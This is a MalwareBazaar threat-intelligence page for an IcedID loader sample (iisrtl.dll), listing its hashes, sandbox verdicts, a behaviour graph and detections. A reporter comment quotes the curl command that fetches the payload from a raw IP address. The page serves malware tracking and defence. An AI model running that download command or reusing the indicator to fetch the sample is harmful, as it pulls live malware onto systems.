🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6c6623787ae81d19e1199da95a9d1980d1fe7ec8a91ee75f219c27262dfcdc42. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



IcedID


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments

SHA256 hash: 6c6623787ae81d19e1199da95a9d1980d1fe7ec8a91ee75f219c27262dfcdc42
SHA3-384 hash: 7655328419f37cf36b60a0ccf9ea9d35c5badc108c24c0b47ee03e6760b338b281cbdcfca5ce7321a32fb26720dbf5e8
SHA1 hash: 704aa4365c952633d6e8b2f4331a2c3b45fef1ea
MD5 hash: e43f21732e357ac28674842585dad8b2
humanhash: sink-montana-music-whiskey
File name:iisrtl.dll
Download: download sample
Signature IcedID
File size:235'368 bytes
First seen:2023-04-14 14:10:34 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash d166377d3b0fb848638127ea07c61851 (1 x IcedID)
ssdeep 3072:Z3PpKjAr1AaA+y23h0xFu92Hs8gEHm1XRZqSplVil/A2g5tqgZE+89TBXn:NAAr1AaA+N2xFy2He5tJEhBX
TLSH T14C343A8A37A72CA6E833D2BCC4C7514651F3B42E4B238FCB455B026A19977C8B97D724
TrID 41.1% (.EXE) Microsoft Visual C++ compiled executable (generic) (16529/12/5)
26.1% (.EXE) Win64 Executable (generic) (10523/12/4)
12.5% (.EXE) Win16 NE executable (generic) (5038/12/1)
5.1% (.ICL) Windows Icons Library (generic) (2059/9)
5.0% (.EXE) OS/2 Executable (generic) (2029/13)
Reporter Rony
Tags:exe gziploader IcedID


Avatar
r0ny_123
uses curl -s --ssl-no-revoke --fail http://95.164.18.138/mms2/YydcMcKSYw2Kd5S7gAHSYyWpw4_C5VqlSQ~~/PLC_813l1aWD2DSJ5OMYE_ZfZSK4-TJg_A~~/ --output xcdnizgm.jnj

Intelligence


File Origin
# of uploads :
1
# of downloads :
343
Origin country :
IN IN
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
iisrtl.dll
Verdict:
No threats detected
Analysis date:
2023-04-14 14:11:07 UTC
Tags:
n/a

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Result
Verdict:
Clean
Maliciousness:
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
icedid overlay packed
Result
Threat name:
Unknown
Detection:
malicious
Classification:
rans
Score:
52 / 100
Signature
Found potential ransomware demand text
Multi AV Scanner detection for submitted file
Behaviour
Behavior Graph:
behaviorgraph top1 signatures2 2 Behavior Graph ID: 846891 Sample: iisrtl.dll.exe Startdate: 14/04/2023 Architecture: WINDOWS Score: 52 37 Multi AV Scanner detection for submitted file 2->37 39 Found potential ransomware demand text 2->39 8 loaddll64.exe 1 2->8         started        process3 process4 10 rundll32.exe 8->10         started        12 cmd.exe 1 8->12         started        14 rundll32.exe 8->14         started        16 7 other processes 8->16 process5 18 WerFault.exe 9 10->18         started        21 rundll32.exe 12->21         started        23 WerFault.exe 21 9 14->23         started        25 WerFault.exe 9 16->25         started        27 WerFault.exe 9 16->27         started        29 WerFault.exe 9 16->29         started        31 2 other processes 16->31 dnsIp6 35 192.168.2.1 unknown unknown 18->35 33 WerFault.exe 9 21->33         started        process7
Verdict:
unknown
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Behaviour
Suspicious use of WriteProcessMemory
Program crash
Unpacked files
SH256 hash:
dd651c2ffe94faf59e3a3db2da56e05a1a12fcae7cd5f87881d1cb036be3ec2a
MD5 hash:
b72e81d4613497ca314b4612e29e8a6c
SHA1 hash:
e518c333f28b35a37a4c38bdc763ee64c15de477
Detections:
IcedIDLoader win_photoloader_auto win_photoloader_a0
SH256 hash:
6c6623787ae81d19e1199da95a9d1980d1fe7ec8a91ee75f219c27262dfcdc42
MD5 hash:
e43f21732e357ac28674842585dad8b2
SHA1 hash:
704aa4365c952633d6e8b2f4331a2c3b45fef1ea
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

IcedID

Executable exe 6c6623787ae81d19e1199da95a9d1980d1fe7ec8a91ee75f219c27262dfcdc42

(this sample)

  
Delivery method
Distributed via web download

Comments